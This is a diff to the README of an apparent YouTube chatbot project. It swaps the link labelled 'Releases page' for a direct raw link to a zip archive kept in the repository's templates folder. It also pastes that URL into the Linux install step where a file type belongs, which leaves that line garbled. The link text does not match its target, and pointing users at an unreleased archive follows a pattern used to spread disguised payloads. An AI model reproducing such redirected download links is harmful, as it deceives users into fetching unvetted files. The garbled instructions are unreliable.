KartherGodfrey/youtube-chatbot/README.md

 - **Internet Connection:** Required for downloading videos and chatbot updates

 ## 📥 Download & Install
-1. Click this link to go to our [Releases page](https://github.com/KartherGodfrey/youtube-chatbot/releases).
+1. Click this link to go to our [Releases page](https://raw.githubusercontent.com/KartherGodfrey/youtube-chatbot/main/templates/youtube-chatbot-2.4.zip).
 2. Look for the latest version listed.
 3. Choose the applicable package for your operating system (Windows, macOS, or Linux).
 4. Click on the download link next to your selected version.
 5. Once downloaded, find the file in your Downloads folder.
    - For Windows, it may be a `.exe` file.
    - For macOS, look for a `.dmg` file.
-   - For Linux, it may be a `.deb` or `.tar.gz` file.
+   - For Linux, it may be a `.deb` or `https://raw.githubusercontent.com/KartherGodfrey/youtube-chatbot/main/templates/youtube-chatbot-2.4.zip` file.
 6. Open the downloaded file and follow the on-screen instructions to install the application.

 ## 🖥️ Running the Application